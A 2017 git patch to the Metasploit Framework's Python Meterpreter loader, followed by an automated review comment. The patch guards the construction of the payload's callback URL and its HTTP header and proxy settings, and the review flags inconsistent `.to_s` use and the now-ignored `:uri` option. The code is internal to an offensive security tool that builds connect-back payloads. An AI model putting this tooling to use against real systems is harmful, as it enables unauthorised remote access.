From 37ab771ca9d2fbc24c55da443cbb8ead997a161d Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Thu, 21 Sep 2017 03:02:13 -0500
Subject: [PATCH] uri is not always defined, fix python stager generation
---
 .../core/payload/python/meterpreter_loader.rb | 42 ++++++++++---------
 1 file changed, 22 insertions(+), 20 deletions(-)
diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb
index 7f4935bc4b..11cb72d6c7 100644
--- a/lib/msf/core/payload/python/meterpreter_loader.rb
+++ b/lib/msf/core/payload/python/meterpreter_loader.rb
@@ -105,28 +105,30 @@ module Payload::Python::MeterpreterLoader
 # The callback URL can be different to the one that we're receiving from the interface
 # so we need to generate it
 # TODO: move this to somewhere more common so that it can be used across payload types
- uri = "/#{(opts[:uri].to_s == '' ? opts[:url] : opts[:uri].to_s).split('/').reject(&:empty?)[-1]}"
- callback_url = [
- opts[:url].split(':')[0],
- '://',
- (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s,
- ':',
- (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s,
- ds['LURI'].to_s,
- uri,
- '/'
- ].join('')
+ unless opts[:url].to_s == ''
+ uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}"
+ callback_url = [
+ opts[:url].to_s.split(':')[0],
+ '://',
+ (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s,
+ ':',
+ (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s,
+ ds['LURI'].to_s,
+ uri,
+ '/'
+ ].join('')

- # patch in the various payload related configuration
- met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'")
- met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != ''
- met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != ''
- met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != ''
- met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != ''
+ # patch in the various payload related configuration
+ met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'")
+ met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != ''
+ met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != ''
+ met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != ''
+ met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != ''

- if http_proxy_host.to_s != ''
- proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}"
- met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'")
+ if http_proxy_host.to_s != ''
+ proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}"
+ met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'")
+ end
 end

 # patch in any optional stageless tcp socket setup
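Review bot: The added `uri` line calls `opts[:url].split('/')` directly, while the guard above it and the scheme line below it both go through `.to_s`, so a `:url` value that passes the guard but does not respond to `split` would raise here; `uri = "/#{opts[:url].to_s.split('/').reject(&:empty?)[-1]}"` keeps the three uses consistent. The same line no longer consults `opts[:uri]` at all, so a caller that still passes `:uri` has it silently ignored; if that is intended, a short comment saying so would save the next reader a trip through the history. The new `unless` also gates the user-agent, cookie, host, referer and proxy substitutions, which is worth stating at the top of the block, for example `# HTTP settings are only patched in when a callback URL is supplied`. The enclosing method starts and ends outside the hunk, and `var_escape` is defined there too, so the quoting of these values inside the generated Python literals cannot be checked from this diff.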